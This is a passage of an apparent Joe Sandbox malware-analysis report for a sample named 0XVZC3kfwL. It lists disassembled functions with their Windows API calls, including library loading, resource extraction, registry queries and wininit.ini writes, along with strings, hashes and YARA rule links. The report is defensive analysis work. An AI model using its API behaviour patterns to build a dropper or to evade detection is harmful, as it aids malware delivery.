                                                                                          • Instruction ID: ba94879caa4e8b048cadb7987fbea524c9931f698b94c5f5971ee7c9ad12ed5d
                                                                                          • Opcode Fuzzy Hash: ff462ce63a305f3a2fc0ff44f4bbd5613ae8e25fd08773fadb5e4e06ed0c4393
                                                                                          • Instruction Fuzzy Hash: 11029F61A0C782C7FB618B28D4942796BB2BF6E750F78253DC95EC6695CE3CE405C701
                                                                                          Function 00007FF681C24B70 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 141libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF681C23723), ref: 00007FF681C24B9A
                                                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF681C23723), ref: 00007FF681C24BBE
                                                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF681C23723), ref: 00007FF681C24BDE
                                                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF681C23723), ref: 00007FF681C24C05
                                                                                          • GetTempPathA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF681C23723), ref: 00007FF681C24C36
                                                                                          • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF681C23723), ref: 00007FF681C24C54
                                                                                          • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF681C23723), ref: 00007FF681C24C6E
                                                                                          • FreeLibrary.KERNEL32 ref: 00007FF681C24D50
                                                                                          • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF681C23723), ref: 00007FF681C24D6C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                          • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                          • API String ID: 1865808269-1731843650
                                                                                          • Opcode ID: 00cffe6a6b6efc49b9df64414d7755e864694d57a2bcf60638ec42af2eb0385e
                                                                                          • Instruction ID: ed5c0a1e0134091d5d860383f8ecc65d99d8428eb6faa15573619972300cb98b
                                                                                          • Opcode Fuzzy Hash: 00cffe6a6b6efc49b9df64414d7755e864694d57a2bcf60638ec42af2eb0385e
                                                                                          • Instruction Fuzzy Hash: 72516D62A09B91C7EB518B15E8141797BB0FF8EB90FA56279CA4E87794DF3CE409C700
                                                                                          Function 00007FF681C22644 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 147registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: CharDirectory$NextSystem$CloseEnvironmentExpandOpenQueryStringsUpperValueWindows
                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                          • API String ID: 229715263-2428544900
                                                                                          • Opcode ID: 5f260c0c44f67a4d333ec0cf67bdc95a0204cc5ba749ef7936c119a4bc59c0ba
                                                                                          • Instruction ID: f806252a78c5df6b0e973ceaabe1de2af12cc4e2d2311322d5c7d8226ce4772f
                                                                                          • Opcode Fuzzy Hash: 5f260c0c44f67a4d333ec0cf67bdc95a0204cc5ba749ef7936c119a4bc59c0ba
                                                                                          • Instruction Fuzzy Hash: 68515E72618681C7EB518B10E4442BABBB0FF8AB80FA46139EA5E87794DF7CD545C700
                                                                                          Function 00007FF681C24F2C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 183memorywindowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Local$AllocMessage$EnumLanguagesResource$BeepCharCloseFreeLoadMetricsNextOpenQueryStringSystemValueVersion
                                                                                          • String ID: gam$rce.
                                                                                          • API String ID: 2929476258-1562192793
                                                                                          • Opcode ID: 695e6ae24b2fda61812be3d6b4eb2d2880fa2c845b4d1dcc7c30464c9a896a07
                                                                                          • Instruction ID: 8cce30d8186c1aa8b646cdbc9d6222975a3f5f89af5632f515c15374db0c0a15
                                                                                          • Opcode Fuzzy Hash: 695e6ae24b2fda61812be3d6b4eb2d2880fa2c845b4d1dcc7c30464c9a896a07
                                                                                          • Instruction Fuzzy Hash: 8E717C61E08782C7FB518B65E8003F96AA0BF5DB94F246238DE4E97795DE3CE586C700
                                                                                          Function 00007FF681C2351E Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 69windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                          • String ID: gam
                                                                                          • API String ID: 3785188418-4248585140
                                                                                          • Opcode ID: 3cd91ea36e2fe533022bde91c2053d597b5ed78ae3c01b02fd4e722d67f546ca
                                                                                          • Instruction ID: 0796f8721de416b32e2e15007d5ef41523c5d342d7aa4551401a660dd83a5aa2
                                                                                          • Opcode Fuzzy Hash: 3cd91ea36e2fe533022bde91c2053d597b5ed78ae3c01b02fd4e722d67f546ca
                                                                                          • Instruction Fuzzy Hash: 2831CD75A08652C7EB509B65E8042B47A71FF8EB61F64B338C91E86394DF7CA589C600
                                                                                          Function 00007FF681C21258 Relevance: 16.6, APIs: 11, Instructions: 125memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                          • String ID:
                                                                                          • API String ID: 2168512254-0
                                                                                          • Opcode ID: 5b9a876a687c0cd876b8f10eb9d641b76ea1257b643d82222502781fe655744d
                                                                                          • Instruction ID: aaaaf50545b4404515827e28d430024ce95113ff7cde21518dd7f47c94762582
                                                                                          • Opcode Fuzzy Hash: 5b9a876a687c0cd876b8f10eb9d641b76ea1257b643d82222502781fe655744d
                                                                                          • Instruction Fuzzy Hash: E6512C32604A81CBE7608F61E4941A97BB4FF8DB88F616139DA0E93754DF3DE544CB00
                                                                                          Function 00007FF681C28154 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                          • String ID: Control Panel\Desktop\ResourceLocale
                                                                                          • API String ID: 3346862599-1109908249
                                                                                          • Opcode ID: 92574d76233e057d688226138012ae270226e38269e34de28d45b127ba883e32
                                                                                          • Instruction ID: 325f82b5e978d4afe11aa2130427c22885e8c8bf2fbe6a5604f1b10d822fa40c
                                                                                          • Opcode Fuzzy Hash: 92574d76233e057d688226138012ae270226e38269e34de28d45b127ba883e32
                                                                                          • Instruction Fuzzy Hash: B851B032A08A91CBEB508B21E4401B977B4FF8EB50F65613ADA5D83795DF3CE444CB04
                                                                                          Function 00007FF681C22AE8 Relevance: 12.2, APIs: 8, Instructions: 175COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Char$Next$Upper$ByteFileLeadModuleNamePrev
                                                                                          • String ID:
                                                                                          • API String ID: 975904313-0
                                                                                          • Opcode ID: 0d82e86da81dc2cef2af64c70c057c8b3ef052c49615e3a21940497ab07f1174
                                                                                          • Instruction ID: 1f0e641c1b5ba5a32acd9a783cf1f32836fe4549148e3a706f7bfe2a7552a77a
                                                                                          • Opcode Fuzzy Hash: 0d82e86da81dc2cef2af64c70c057c8b3ef052c49615e3a21940497ab07f1174
                                                                                          • Instruction Fuzzy Hash: 41716E61A0C6C5C6FF624F64D4103B86BB0BF5EB90F686279CAAE87791CF6CA445C311
                                                                                          Function 00007FF681C22898 Relevance: 12.2, APIs: 8, Instructions: 162memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Global$Char$FileInfoNextQueryUnlockValueVersion$AllocEnvironmentExpandFreeLockOpenSizeStringsUpper
                                                                                          • String ID:
                                                                                          • API String ID: 2156179360-0
                                                                                          • Opcode ID: f5cf7ecaecd271d02cfedb1b12fcc4206d5a711b6b10f9e7bdb34ea6bdc4f517
                                                                                          • Instruction ID: 7e374b65bbd01abc8a089ec1c01929f7c8c4273c9608c996dfdd06a088a167a7
                                                                                          • Opcode Fuzzy Hash: f5cf7ecaecd271d02cfedb1b12fcc4206d5a711b6b10f9e7bdb34ea6bdc4f517
                                                                                          • Instruction Fuzzy Hash: BF614972A08692CBEB608B15D5056B87BB1FF09794F24A539DE2D93B94DF3CE881C740
                                                                                          Function 00007FF681C24DC8 Relevance: 10.6, APIs: 7, Instructions: 100COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$CapsDeviceRect$Release
                                                                                          • String ID:
                                                                                          • API String ID: 2212493051-0
                                                                                          • Opcode ID: 69ea89c86bae83f4795465c8798f6678767ed30391b1f5c5e5c0b97e0bec92e7
                                                                                          • Instruction ID: 5ed4e9501b033fe227d25b5cbb27e64733527967a55c9c7b9e508e03a8f8f935
                                                                                          • Opcode Fuzzy Hash: 69ea89c86bae83f4795465c8798f6678767ed30391b1f5c5e5c0b97e0bec92e7
                                                                                          • Instruction Fuzzy Hash: F0313A36B24651CBE7108B65E904AADBBB1FB4DB99F696134CE0A93B44CE3CE445CB00
                                                                                          Function 00007FF681C24064 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 71memorystringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF681C251F8: FindResourceA.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25220
                                                                                            • Part of subcall function 00007FF681C251F8: SizeofResource.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25231
                                                                                            • Part of subcall function 00007FF681C251F8: FindResourceA.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25257
                                                                                            • Part of subcall function 00007FF681C251F8: LoadResource.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25268
                                                                                            • Part of subcall function 00007FF681C251F8: LockResource.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25277
                                                                                            • Part of subcall function 00007FF681C251F8: memcpy_s.MSVCRT ref: 00007FF681C25296
                                                                                            • Part of subcall function 00007FF681C251F8: FreeResource.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C252A5
                                                                                          • LocalAlloc.KERNEL32(?,?,?,?,?,00007FF681C23261), ref: 00007FF681C24085
                                                                                          • LocalFree.KERNEL32 ref: 00007FF681C24108
                                                                                            • Part of subcall function 00007FF681C24F2C: LoadStringA.USER32 ref: 00007FF681C24FBC
                                                                                            • Part of subcall function 00007FF681C24F2C: MessageBoxA.USER32 ref: 00007FF681C24FFC
                                                                                            • Part of subcall function 00007FF681C27958: GetLastError.KERNEL32 ref: 00007FF681C2795C
                                                                                          • lstrcmpA.KERNEL32(?,?,?,?,?,00007FF681C23261), ref: 00007FF681C2412E
                                                                                          • LocalFree.KERNEL32(?,?,?,?,?,00007FF681C23261), ref: 00007FF681C2418F
                                                                                            • Part of subcall function 00007FF681C27D28: FindResourceA.KERNEL32 ref: 00007FF681C27D52
                                                                                            • Part of subcall function 00007FF681C27D28: LoadResource.KERNEL32 ref: 00007FF681C27D69
                                                                                            • Part of subcall function 00007FF681C27D28: DialogBoxIndirectParamA.USER32 ref: 00007FF681C27D9F
                                                                                            • Part of subcall function 00007FF681C27D28: FreeResource.KERNEL32 ref: 00007FF681C27DB1
                                                                                          • LocalFree.KERNEL32 ref: 00007FF681C24168
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                          • String ID: <None>$LICENSE
                                                                                          • API String ID: 2414642746-383193767
                                                                                          • Opcode ID: 1c43a6c209edff215d2b42a35ca82b93fc35595726ea4f293da311bf4292f90f
                                                                                          • Instruction ID: 9043c33acbc4c10e9439685a4e5373d65841c7acd6ec264bb848cf23f32c86e7
                                                                                          • Opcode Fuzzy Hash: 1c43a6c209edff215d2b42a35ca82b93fc35595726ea4f293da311bf4292f90f
                                                                                          • Instruction Fuzzy Hash: CC313472A19652C7F7609F20E8557BA7670FF9D786F706539C90E866A0DFBDA004CB00
                                                                                          Function 00007FF681C27984 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF681C2625F), ref: 00007FF681C279BB
                                                                                          • LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF681C2625F), ref: 00007FF681C279CA
                                                                                          • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF681C2625F), ref: 00007FF681C27A1A
                                                                                          • FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF681C2625F), ref: 00007FF681C27A4E
                                                                                          • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF681C2625F), ref: 00007FF681C27A67
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Resource$Free$FindLoadLock
                                                                                          • String ID: UPDFILE%lu
                                                                                          • API String ID: 3629466761-2329316264
                                                                                          • Opcode ID: 912f736fff6cc648edac57934596fe713f99585f0c6d65f4e9552fedd6e4e983
                                                                                          • Instruction ID: 93159f86b6b466e8df77863aea8fc8245d9c3b35d5a01a4adb9d7bc73ddbcb6f
                                                                                          • Opcode Fuzzy Hash: 912f736fff6cc648edac57934596fe713f99585f0c6d65f4e9552fedd6e4e983
                                                                                          • Instruction Fuzzy Hash: AA319F72A18B41C7EB508B25E4411B9BAB1FF9DF50F65A239DA1E83394CF3CE505C640
                                                                                          Function 00007FF681C251F8 Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                          • String ID:
                                                                                          • API String ID: 3370778649-0
                                                                                          • Opcode ID: 2722992ef715b720f40bc041322e554c29a54f2f23c26d5441508fe68943f667
                                                                                          • Instruction ID: 8a7daee2c57dd596f1fa1f7d7e888ef5a17d77130e1dba8e59bc9d2829aa9f87
                                                                                          • Opcode Fuzzy Hash: 2722992ef715b720f40bc041322e554c29a54f2f23c26d5441508fe68943f667
                                                                                          • Instruction Fuzzy Hash: 3411F461B09B92C7EB545B62A5041BAAAA0FF4EF81B59A438EE0F83794DE3CD441C600
                                                                                          Function 00007FF681C22234 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                          • String ID: wininit.ini
                                                                                          • API String ID: 3273605193-4206010578
                                                                                          • Opcode ID: 272abce5711e61987618d7fa9275a95ad876e249e85b0132ec51f4cc75ec81ca
                                                                                          • Instruction ID: 784f72cabd3b9cee75d9b1633c5d1e4b344b3d0af5dd0d3b2b682f39dd5f9b12
                                                                                          • Opcode Fuzzy Hash: 272abce5711e61987618d7fa9275a95ad876e249e85b0132ec51f4cc75ec81ca
                                                                                          • Instruction Fuzzy Hash: F0113D32604A81C7E7208B25E4542AAB6B1FFCD715F959235DA5E83664DF3CD549CA00
                                                                                          Function 00007FF681C2397E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Text$DesktopDialogForegroundItem
                                                                                          • String ID: gam
                                                                                          • API String ID: 761066910-4248585140
                                                                                          • Opcode ID: f21d8755046b2bff5672eb5e92626a0ccf9070bb66767417a7c329f8521aba4d
                                                                                          • Instruction ID: e50a283a505d9fd6606dfb4e1cd7cf4ad587c8915f21018fd3108f40a22ad711
                                                                                          • Opcode Fuzzy Hash: f21d8755046b2bff5672eb5e92626a0ccf9070bb66767417a7c329f8521aba4d
                                                                                          • Instruction Fuzzy Hash: 9F111EA1E08742CBF7545B61E8092B86A71FF8EB41FB4B138C90E86394DF7CA488C700
                                                                                          Function 00007FF681C24A54 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 55memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF681C251F8: FindResourceA.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25220
                                                                                            • Part of subcall function 00007FF681C251F8: SizeofResource.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25231
                                                                                            • Part of subcall function 00007FF681C251F8: FindResourceA.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25257
                                                                                            • Part of subcall function 00007FF681C251F8: LoadResource.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25268
                                                                                            • Part of subcall function 00007FF681C251F8: LockResource.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25277
                                                                                            • Part of subcall function 00007FF681C251F8: memcpy_s.MSVCRT ref: 00007FF681C25296
                                                                                            • Part of subcall function 00007FF681C251F8: FreeResource.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C252A5
                                                                                          • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF681C234BA), ref: 00007FF681C24A7D
                                                                                          • LocalFree.KERNEL32(?,?,?,?,00000000,00007FF681C234BA), ref: 00007FF681C24B19
                                                                                            • Part of subcall function 00007FF681C24F2C: LoadStringA.USER32 ref: 00007FF681C24FBC
                                                                                            • Part of subcall function 00007FF681C24F2C: MessageBoxA.USER32 ref: 00007FF681C24FFC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
